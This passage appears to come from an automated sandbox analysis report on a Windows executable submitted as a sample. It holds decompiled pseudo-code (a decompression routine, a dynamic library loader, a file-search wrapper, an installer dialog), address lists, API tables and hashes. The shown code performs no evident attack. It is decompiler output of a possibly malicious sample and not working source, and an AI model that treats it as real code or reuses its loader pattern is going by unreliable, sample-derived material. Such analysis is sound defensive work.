                                                                                                                          							__ecx = __ebx >> 1;
                                                                                                                          							__eax = __ebx & 0x00000001;
                                                                                                                          							__ecx = (__ebx >> 1) - 1;
                                                                                                                          							__al = __al | 0x00000002;
                                                                                                                          							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                          							__eflags = __ebx - 0xe;
                                                                                                                          							 *(__ebp - 0x2c) = __eax;
                                                                                                                          							if(__ebx >= 0xe) {
                                                                                                                          								__ebx = 0;
                                                                                                                          								 *(__ebp - 0x48) = __ecx;
                                                                                                                          								L102:
                                                                                                                          								__eflags =  *(__ebp - 0x48);
                                                                                                                          								if( *(__ebp - 0x48) <= 0) {
                                                                                                                          									__eax = __eax + __ebx;
                                                                                                                          									 *(__ebp - 0x40) = 4;
                                                                                                                          									 *(__ebp - 0x2c) = __eax;
                                                                                                                          									__eax =  *(__ebp - 4);
                                                                                                                          									__eax =  *(__ebp - 4) + 0x644;
                                                                                                                          									__eflags = __eax;
                                                                                                                          									L108:
                                                                                                                          									__ebx = 0;
                                                                                                                          									 *(__ebp - 0x58) = __eax;
                                                                                                                          									 *(__ebp - 0x50) = 1;
                                                                                                                          									 *(__ebp - 0x44) = 0;
                                                                                                                          									 *(__ebp - 0x48) = 0;
                                                                                                                          									L112:
                                                                                                                          									__eax =  *(__ebp - 0x40);
                                                                                                                          									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                          										_t391 = __ebp - 0x2c;
                                                                                                                          										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                          										__eflags =  *_t391;
                                                                                                                          										goto L119;
                                                                                                                          									}
                                                                                                                          									__eax =  *(__ebp - 0x50);
                                                                                                                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          									__eax =  *(__ebp - 0x58);
                                                                                                                          									__esi = __edi + __eax;
                                                                                                                          									 *(__ebp - 0x54) = __esi;
                                                                                                                          									__ax =  *__esi;
                                                                                                                          									__ecx = __ax & 0x0000ffff;
                                                                                                                          									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                          									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                          									if( *(__ebp - 0xc) >= __edx) {
                                                                                                                          										__ecx = 0;
                                                                                                                          										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                          										__ecx = 1;
                                                                                                                          										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                          										__ebx = 1;
                                                                                                                          										__ecx =  *(__ebp - 0x48);
                                                                                                                          										__ebx = 1 << __cl;
                                                                                                                          										__ecx = 1 << __cl;
                                                                                                                          										__ebx =  *(__ebp - 0x44);
                                                                                                                          										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                          										__cx = __ax;
                                                                                                                          										__cx = __ax >> 5;
                                                                                                                          										__eax = __eax - __ecx;
                                                                                                                          										__edi = __edi + 1;
                                                                                                                          										__eflags = __edi;
                                                                                                                          										 *(__ebp - 0x44) = __ebx;
                                                                                                                          										 *__esi = __ax;
                                                                                                                          										 *(__ebp - 0x50) = __edi;
                                                                                                                          									} else {
                                                                                                                          										 *(__ebp - 0x10) = __edx;
                                                                                                                          										0x800 = 0x800 - __ecx;
                                                                                                                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                          										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                          										 *__esi = __dx;
                                                                                                                          									}
                                                                                                                          									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          										L111:
                                                                                                                          										_t368 = __ebp - 0x48;
                                                                                                                          										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                          										__eflags =  *_t368;
                                                                                                                          										goto L112;
                                                                                                                          									} else {
                                                                                                                          										goto L109;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								__ecx =  *(__ebp - 0xc);
                                                                                                                          								__ebx = __ebx + __ebx;
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                          								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                          								 *(__ebp - 0x44) = __ebx;
                                                                                                                          								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                          									__ecx =  *(__ebp - 0x10);
                                                                                                                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                          									__ebx = __ebx | 0x00000001;
                                                                                                                          									__eflags = __ebx;
                                                                                                                          									 *(__ebp - 0x44) = __ebx;
                                                                                                                          								}
                                                                                                                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          									L101:
                                                                                                                          									_t338 = __ebp - 0x48;
                                                                                                                          									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                          									__eflags =  *_t338;
                                                                                                                          									goto L102;
                                                                                                                          								} else {
                                                                                                                          									goto L99;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							__edx =  *(__ebp - 4);
                                                                                                                          							__eax = __eax - __ebx;
                                                                                                                          							 *(__ebp - 0x40) = __ecx;
                                                                                                                          							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                          							goto L108;
                                                                                                                          						case 0x1a:
                                                                                                                          							goto L55;
                                                                                                                          						case 0x1b:
                                                                                                                          							L75:
                                                                                                                          							__eflags =  *(__ebp - 0x64);
                                                                                                                          							if( *(__ebp - 0x64) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0x1b;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 0x14);
                                                                                                                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          							__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          							if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          								__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          								__eflags = __eax;
                                                                                                                          							}
                                                                                                                          							__edx =  *(__ebp - 8);
                                                                                                                          							__cl =  *(__eax + __edx);
                                                                                                                          							__eax =  *(__ebp - 0x14);
                                                                                                                          							 *(__ebp - 0x5c) = __cl;
                                                                                                                          							 *(__eax + __edx) = __cl;
                                                                                                                          							__eax = __eax + 1;
                                                                                                                          							__edx = 0;
                                                                                                                          							_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                          							__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          							__edx = _t274;
                                                                                                                          							__eax =  *(__ebp - 0x68);
                                                                                                                          							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                          							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          							_t283 = __ebp - 0x64;
                                                                                                                          							 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                          							__eflags =  *_t283;
                                                                                                                          							 *( *(__ebp - 0x68)) = __cl;
                                                                                                                          							goto L79;
                                                                                                                          						case 0x1c:
                                                                                                                          							while(1) {
                                                                                                                          								L123:
                                                                                                                          								__eflags =  *(__ebp - 0x64);
                                                                                                                          								if( *(__ebp - 0x64) == 0) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								__eax =  *(__ebp - 0x14);
                                                                                                                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          								__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          								if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          									__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          									__eflags = __eax;
                                                                                                                          								}
                                                                                                                          								__edx =  *(__ebp - 8);
                                                                                                                          								__cl =  *(__eax + __edx);
                                                                                                                          								__eax =  *(__ebp - 0x14);
                                                                                                                          								 *(__ebp - 0x5c) = __cl;
                                                                                                                          								 *(__eax + __edx) = __cl;
                                                                                                                          								__eax = __eax + 1;
                                                                                                                          								__edx = 0;
                                                                                                                          								_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                          								__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          								__edx = _t414;
                                                                                                                          								__eax =  *(__ebp - 0x68);
                                                                                                                          								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                          								__eflags =  *(__ebp - 0x30);
                                                                                                                          								 *( *(__ebp - 0x68)) = __cl;
                                                                                                                          								 *(__ebp - 0x14) = __edx;
                                                                                                                          								if( *(__ebp - 0x30) > 0) {
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									goto L80;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							 *(__ebp - 0x88) = 0x1c;
                                                                                                                          							goto L170;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}













                                                                                                                          0x00405fd4
                                                                                                                          0x00405fdb
                                                                                                                          0x00405fde
                                                                                                                          0x00405fe9
                                                                                                                          0x00405ff1
                                                                                                                          0x00405ff1
                                                                                                                          0x00405feb
                                                                                                                          0x00405feb
                                                                                                                          0x00405feb
                                                                                                                          0x00405fe0
                                                                                                                          0x00405fe0
                                                                                                                          0x00405fe0
                                                                                                                          0x00405ff8
                                                                                                                          0x00406016
                                                                                                                          0x00406018
                                                                                                                          0x004061eb
                                                                                                                          0x004061eb
                                                                                                                          0x004061ee
                                                                                                                          0x004061f1
                                                                                                                          0x004061f4
                                                                                                                          0x004061f7
                                                                                                                          0x004061fa
                                                                                                                          0x004061fd
                                                                                                                          0x00406200
                                                                                                                          0x00406203
                                                                                                                          0x00406209
                                                                                                                          0x00406221
                                                                                                                          0x00406224
                                                                                                                          0x00406227
                                                                                                                          0x0040622a
                                                                                                                          0x0040622a
                                                                                                                          0x0040622d
                                                                                                                          0x00406233
                                                                                                                          0x0040620b
                                                                                                                          0x0040620b
                                                                                                                          0x00406213
                                                                                                                          0x00406218
                                                                                                                          0x0040621a
                                                                                                                          0x0040621c
                                                                                                                          0x0040621c
                                                                                                                          0x0040623d
                                                                                                                          0x00406240
                                                                                                                          0x004061e3
                                                                                                                          0x004061e9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406242
                                                                                                                          0x004061be
                                                                                                                          0x004061c2
                                                                                                                          0x004067ca
                                                                                                                          0x00000000
                                                                                                                          0x004067ca
                                                                                                                          0x004061c8
                                                                                                                          0x004061cb
                                                                                                                          0x004061ce
                                                                                                                          0x004061d2
                                                                                                                          0x004061d5
                                                                                                                          0x004061db
                                                                                                                          0x004061dd
                                                                                                                          0x004061dd
                                                                                                                          0x004061e0
                                                                                                                          0x00000000
                                                                                                                          0x004061e0
                                                                                                                          0x00405ffa
                                                                                                                          0x00405ffa
                                                                                                                          0x00405ffd
                                                                                                                          0x00406003
                                                                                                                          0x00406005
                                                                                                                          0x00406005
                                                                                                                          0x00406008
                                                                                                                          0x0040600b
                                                                                                                          0x0040600d
                                                                                                                          0x0040600e
                                                                                                                          0x00406011
                                                                                                                          0x0040607e
                                                                                                                          0x0040607e
                                                                                                                          0x00406082
                                                                                                                          0x00406085
                                                                                                                          0x00406088
                                                                                                                          0x0040608b
                                                                                                                          0x0040608e
                                                                                                                          0x0040608f
                                                                                                                          0x00406092
                                                                                                                          0x00406094
                                                                                                                          0x0040609a
                                                                                                                          0x0040609d
                                                                                                                          0x004060a0
                                                                                                                          0x004060a3
                                                                                                                          0x004060a6
                                                                                                                          0x004060ac
                                                                                                                          0x004060c8
                                                                                                                          0x004060cb
                                                                                                                          0x004060ce
                                                                                                                          0x004060d1
                                                                                                                          0x004060d8
                                                                                                                          0x004060de
                                                                                                                          0x004060e2
                                                                                                                          0x004060ae
                                                                                                                          0x004060ae
                                                                                                                          0x004060b2
                                                                                                                          0x004060ba
                                                                                                                          0x004060bf
                                                                                                                          0x004060c1
                                                                                                                          0x004060c3
                                                                                                                          0x004060c3
                                                                                                                          0x004060ec
                                                                                                                          0x004060ef
                                                                                                                          0x00406066
                                                                                                                          0x00406066
                                                                                                                          0x0040606c
                                                                                                                          0x0040611f
                                                                                                                          0x00406125
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406127
                                                                                                                          0x0040612a
                                                                                                                          0x0040612d
                                                                                                                          0x00406130
                                                                                                                          0x00406133
                                                                                                                          0x00406136
                                                                                                                          0x00406139
                                                                                                                          0x0040613c
                                                                                                                          0x0040613f
                                                                                                                          0x00406145
                                                                                                                          0x0040615d
                                                                                                                          0x00406160
                                                                                                                          0x00406163
                                                                                                                          0x00406166
                                                                                                                          0x00406166
                                                                                                                          0x00406169
                                                                                                                          0x0040616f
                                                                                                                          0x00406147
                                                                                                                          0x00406147
                                                                                                                          0x0040614f
                                                                                                                          0x00406154
                                                                                                                          0x00406156
                                                                                                                          0x00406158
                                                                                                                          0x00406158
                                                                                                                          0x00406179
                                                                                                                          0x0040617c
                                                                                                                          0x004060fa
                                                                                                                          0x004060fe
                                                                                                                          0x004067be
                                                                                                                          0x00000000
                                                                                                                          0x004067be
                                                                                                                          0x00406104
                                                                                                                          0x00406107
                                                                                                                          0x0040610a
                                                                                                                          0x0040610e
                                                                                                                          0x00406111
                                                                                                                          0x00406117
                                                                                                                          0x00406119
                                                                                                                          0x00406119
                                                                                                                          0x0040611c
                                                                                                                          0x0040611c
                                                                                                                          0x0040617c
                                                                                                                          0x00406183
                                                                                                                          0x00406183
                                                                                                                          0x00406183
                                                                                                                          0x00406187
                                                                                                                          0x00406187
                                                                                                                          0x0040618a
                                                                                                                          0x0040618d
                                                                                                                          0x00406191
                                                                                                                          0x004067d6
                                                                                                                          0x00000000
                                                                                                                          0x004067d6
                                                                                                                          0x00406197
                                                                                                                          0x0040619a
                                                                                                                          0x0040619d
                                                                                                                          0x004061a0
                                                                                                                          0x004061a3
                                                                                                                          0x004061a6
                                                                                                                          0x004061a9
                                                                                                                          0x004061ab
                                                                                                                          0x004061ae
                                                                                                                          0x004061b1
                                                                                                                          0x004061b4
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x004061b6
                                                                                                                          0x00406353
                                                                                                                          0x00406353
                                                                                                                          0x00406356
                                                                                                                          0x00406356
                                                                                                                          0x00000000
                                                                                                                          0x00406356
                                                                                                                          0x00406078
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004060f5
                                                                                                                          0x00406041
                                                                                                                          0x00406045
                                                                                                                          0x004067b2
                                                                                                                          0x0040682e
                                                                                                                          0x00406836
                                                                                                                          0x0040683d
                                                                                                                          0x0040683f
                                                                                                                          0x00406846
                                                                                                                          0x0040684a
                                                                                                                          0x0040684a
                                                                                                                          0x0040604b
                                                                                                                          0x0040604e
                                                                                                                          0x00406051
                                                                                                                          0x00406055
                                                                                                                          0x00406058
                                                                                                                          0x0040605e
                                                                                                                          0x004065de
                                                                                                                          0x004065e2
                                                                                                                          0x00406604
                                                                                                                          0x00406607
                                                                                                                          0x00406611
                                                                                                                          0x00000000
                                                                                                                          0x00406611
                                                                                                                          0x004065e4
                                                                                                                          0x004065e7
                                                                                                                          0x004065eb
                                                                                                                          0x004065ee
                                                                                                                          0x004065ee
                                                                                                                          0x004065f1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040669b
                                                                                                                          0x0040669f
                                                                                                                          0x004066bd
                                                                                                                          0x004066bd
                                                                                                                          0x004066bd
                                                                                                                          0x004066c4
                                                                                                                          0x004066cb
                                                                                                                          0x004066d2
                                                                                                                          0x004066d2
                                                                                                                          0x00000000
                                                                                                                          0x004066d2
                                                                                                                          0x004066a1
                                                                                                                          0x004066a4
                                                                                                                          0x004066a7
                                                                                                                          0x004066aa
                                                                                                                          0x004066b1
                                                                                                                          0x004065f5
                                                                                                                          0x004065f5
                                                                                                                          0x004065f8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040678c
                                                                                                                          0x0040678f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063c6
                                                                                                                          0x004063c8
                                                                                                                          0x004063cf
                                                                                                                          0x004063d0
                                                                                                                          0x004063d2
                                                                                                                          0x004063d5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063dd
                                                                                                                          0x004063e0
                                                                                                                          0x004063e3
                                                                                                                          0x004063e5
                                                                                                                          0x004063e7
                                                                                                                          0x004063e7
                                                                                                                          0x004063e8
                                                                                                                          0x004063eb
                                                                                                                          0x004063f2
                                                                                                                          0x004063f5
                                                                                                                          0x00406403
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066dc
                                                                                                                          0x004066e3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066e8
                                                                                                                          0x004066e8
                                                                                                                          0x004066ec
                                                                                                                          0x00406824
                                                                                                                          0x00000000
                                                                                                                          0x00406824
                                                                                                                          0x004066f2
                                                                                                                          0x004066f5
                                                                                                                          0x004066f8
                                                                                                                          0x004066fc
                                                                                                                          0x004066ff
                                                                                                                          0x00406705
                                                                                                                          0x00406707
                                                                                                                          0x00406707
                                                                                                                          0x00406707
                                                                                                                          0x0040670a
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x00406710
                                                                                                                          0x00406710
                                                                                                                          0x00406714
                                                                                                                          0x00406774
                                                                                                                          0x00406777
                                                                                                                          0x0040677c
                                                                                                                          0x0040677d
                                                                                                                          0x0040677f
                                                                                                                          0x00406781
                                                                                                                          0x00406784
                                                                                                                          0x00000000
                                                                                                                          0x00406784
                                                                                                                          0x00406716
                                                                                                                          0x0040671c
                                                                                                                          0x0040671f
                                                                                                                          0x00406722
                                                                                                                          0x00406725
                                                                                                                          0x00406728
                                                                                                                          0x0040672b
                                                                                                                          0x0040672e
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x00406750
                                                                                                                          0x00406753
                                                                                                                          0x00406756
                                                                                                                          0x00406759
                                                                                                                          0x0040675d
                                                                                                                          0x0040675f
                                                                                                                          0x0040675f
                                                                                                                          0x00406760
                                                                                                                          0x00406763
                                                                                                                          0x00406739
                                                                                                                          0x00406739
                                                                                                                          0x00406741
                                                                                                                          0x00406746
                                                                                                                          0x00406748
                                                                                                                          0x0040674b
                                                                                                                          0x0040674b
                                                                                                                          0x00406766
                                                                                                                          0x0040676d
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040640b
                                                                                                                          0x0040640e
                                                                                                                          0x00406444
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406577
                                                                                                                          0x00406577
                                                                                                                          0x0040657a
                                                                                                                          0x0040657c
                                                                                                                          0x00406806
                                                                                                                          0x00000000
                                                                                                                          0x00406806
                                                                                                                          0x00406582
                                                                                                                          0x00406585
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040658b
                                                                                                                          0x0040658f
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00000000
                                                                                                                          0x00406592
                                                                                                                          0x00406410
                                                                                                                          0x00406412
                                                                                                                          0x00406414
                                                                                                                          0x00406416
                                                                                                                          0x00406419
                                                                                                                          0x0040641a
                                                                                                                          0x0040641c
                                                                                                                          0x0040641e
                                                                                                                          0x00406421
                                                                                                                          0x00406424
                                                                                                                          0x0040643a
                                                                                                                          0x0040643f
                                                                                                                          0x00406477
                                                                                                                          0x00406477
                                                                                                                          0x0040647b
                                                                                                                          0x004064a7
                                                                                                                          0x004064a9
                                                                                                                          0x004064b0
                                                                                                                          0x004064b3
                                                                                                                          0x004064b6
                                                                                                                          0x004064b6
                                                                                                                          0x004064bb
                                                                                                                          0x004064bb
                                                                                                                          0x004064bd
                                                                                                                          0x004064c0
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064f7
                                                                                                                          0x004064f7
                                                                                                                          0x004064fa
                                                                                                                          0x004064fd
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00406571
                                                                                                                          0x00000000
                                                                                                                          0x00406571
                                                                                                                          0x004064ff
                                                                                                                          0x00406505
                                                                                                                          0x00406508
                                                                                                                          0x0040650b
                                                                                                                          0x0040650e
                                                                                                                          0x00406511
                                                                                                                          0x00406514
                                                                                                                          0x00406517
                                                                                                                          0x0040651a
                                                                                                                          0x0040651d
                                                                                                                          0x00406520
                                                                                                                          0x00406539
                                                                                                                          0x0040653b
                                                                                                                          0x0040653e
                                                                                                                          0x0040653f

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405CFF(signed int _a4) {
                                                                                                                          				struct HINSTANCE__* _t5;
                                                                                                                          				CHAR* _t7;
                                                                                                                          				signed int _t9;
                                                                                                                          
                                                                                                                          				_t9 = _a4 << 3;
                                                                                                                          				_t7 =  *(_t9 + 0x409200);
                                                                                                                          				_t5 = GetModuleHandleA(_t7);
                                                                                                                          				if(_t5 != 0) {
                                                                                                                          					L2:
                                                                                                                          					return GetProcAddress(_t5,  *(_t9 + 0x409204));
                                                                                                                          				}
                                                                                                                          				_t5 = LoadLibraryA(_t7); // executed
                                                                                                                          				if(_t5 != 0) {
                                                                                                                          					goto L2;
                                                                                                                          				}
                                                                                                                          				return _t5;
                                                                                                                          			}







                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 310444273-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405CD8(CHAR* _a4) {
                                                                                                                          				void* _t2;
                                                                                                                          
                                                                                                                          				_t2 = FindFirstFileA(_a4, 0x4224c8); // executed
                                                                                                                          				if(_t2 == 0xffffffff) {
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				FindClose(_t2);
                                                                                                                          				return 0x4224c8;
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNELBASE(?,004224C8,00421880,004055F4,00421880,00421880,00000000,00421880,00421880,?,?,00000000,00405316,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000), ref: 00405CE3
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405CEF
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2295610775-0
                                                                                                                          • Opcode ID: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
                                                                                                                          • Instruction ID: 9a18407f5d3c0b203e51d924b64f4f6f4a008a27543408caa796c3d3b713bef8
                                                                                                                          • Opcode Fuzzy Hash: eaa6d706d35b9193dbeff2470bba944fadabcf5bc74d52a04f68ed274a91c94e
                                                                                                                          • Instruction Fuzzy Hash: 91D0C93594D620ABD6012728AD0884B6A589B153317508B32F46AE22E0C7748C529AA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 84%
                                                                                                                          			E004038BC(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                                                          				struct HWND__* _v32;
                                                                                                                          				void* _v84;
                                                                                                                          				void* _v88;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				signed int _t35;
                                                                                                                          				signed int _t37;
                                                                                                                          				signed int _t39;
                                                                                                                          				intOrPtr _t44;
                                                                                                                          				struct HWND__* _t49;
                                                                                                                          				signed int _t67;
                                                                                                                          				struct HWND__* _t73;
                                                                                                                          				signed int _t86;
                                                                                                                          				struct HWND__* _t91;
                                                                                                                          				signed int _t99;
                                                                                                                          				int _t103;
                                                                                                                          				signed int _t115;
                                                                                                                          				signed int _t116;
                                                                                                                          				int _t117;
                                                                                                                          				signed int _t122;
                                                                                                                          				struct HWND__* _t125;
                                                                                                                          				struct HWND__* _t126;
                                                                                                                          				int _t127;
                                                                                                                          				long _t130;
                                                                                                                          				int _t132;
                                                                                                                          				int _t133;
                                                                                                                          				void* _t134;
                                                                                                                          				void* _t142;
                                                                                                                          
                                                                                                                          				_t115 = _a8;
                                                                                                                          				if(_t115 == 0x110 || _t115 == 0x408) {
                                                                                                                          					_t35 = _a12;
                                                                                                                          					_t125 = _a4;
                                                                                                                          					__eflags = _t115 - 0x110;
                                                                                                                          					 *0x42045c = _t35;
                                                                                                                          					if(_t115 == 0x110) {
                                                                                                                          						 *0x423e88 = _t125;
                                                                                                                          						 *0x420470 = GetDlgItem(_t125, 1);
                                                                                                                          						_t91 = GetDlgItem(_t125, 2);
                                                                                                                          						_push(0xffffffff);
                                                                                                                          						_push(0x1c);
                                                                                                                          						 *0x41f438 = _t91;
                                                                                                                          						E00403D8F(_t125);
                                                                                                                          						SetClassLongA(_t125, 0xfffffff2,  *0x423668); // executed
                                                                                                                          						 *0x42364c = E0040140B(4);
                                                                                                                          						_t35 = 1;
                                                                                                                          						__eflags = 1;
                                                                                                                          						 *0x42045c = 1;
                                                                                                                          					}
                                                                                                                          					_t122 =  *0x4091a4; // 0xffffffff
                                                                                                                          					_t133 = 0;
                                                                                                                          					_t130 = (_t122 << 6) +  *0x423ea0;
                                                                                                                          					__eflags = _t122;
                                                                                                                          					if(_t122 < 0) {
                                                                                                                          						L34:
                                                                                                                          						E00403DDB(0x40b);
                                                                                                                          						while(1) {
                                                                                                                          							_t37 =  *0x42045c;
                                                                                                                          							 *0x4091a4 =  *0x4091a4 + _t37;
                                                                                                                          							_t130 = _t130 + (_t37 << 6);
                                                                                                                          							_t39 =  *0x4091a4; // 0xffffffff
                                                                                                                          							__eflags = _t39 -  *0x423ea4; // 0x2
                                                                                                                          							if(__eflags == 0) {
                                                                                                                          								E0040140B(1);
                                                                                                                          							}
                                                                                                                          							__eflags =  *0x42364c - _t133; // 0x0
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							_t44 =  *0x423ea4; // 0x2
                                                                                                                          							__eflags =  *0x4091a4 - _t44; // 0xffffffff
                                                                                                                          							if(__eflags >= 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							_t116 =  *(_t130 + 0x14);
                                                                                                                          							E004059FF(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
                                                                                                                          							_push( *((intOrPtr*)(_t130 + 0x20)));
                                                                                                                          							_push(0xfffffc19);
                                                                                                                          							E00403D8F(_t125);
                                                                                                                          							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                                                                                                          							_push(0xfffffc1b);
                                                                                                                          							E00403D8F(_t125);
                                                                                                                          							_push( *((intOrPtr*)(_t130 + 0x28)));
                                                                                                                          							_push(0xfffffc1a);
                                                                                                                          							E00403D8F(_t125);
                                                                                                                          							_t49 = GetDlgItem(_t125, 3);
                                                                                                                          							__eflags =  *0x423f0c - _t133; // 0x0
                                                                                                                          							_v32 = _t49;
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                                                                                                          								__eflags = _t116;
                                                                                                                          							}
                                                                                                                          							ShowWindow(_t49, _t116 & 0x00000008);
                                                                                                                          							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                                                                                                          							E00403DB1(_t116 & 0x00000002);
                                                                                                                          							_t117 = _t116 & 0x00000004;
                                                                                                                          							EnableWindow( *0x41f438, _t117);
                                                                                                                          							__eflags = _t117 - _t133;
                                                                                                                          							if(_t117 == _t133) {
                                                                                                                          								_push(1);
                                                                                                                          							} else {
                                                                                                                          								_push(_t133);
                                                                                                                          							}
                                                                                                                          							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                                                                                                          							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
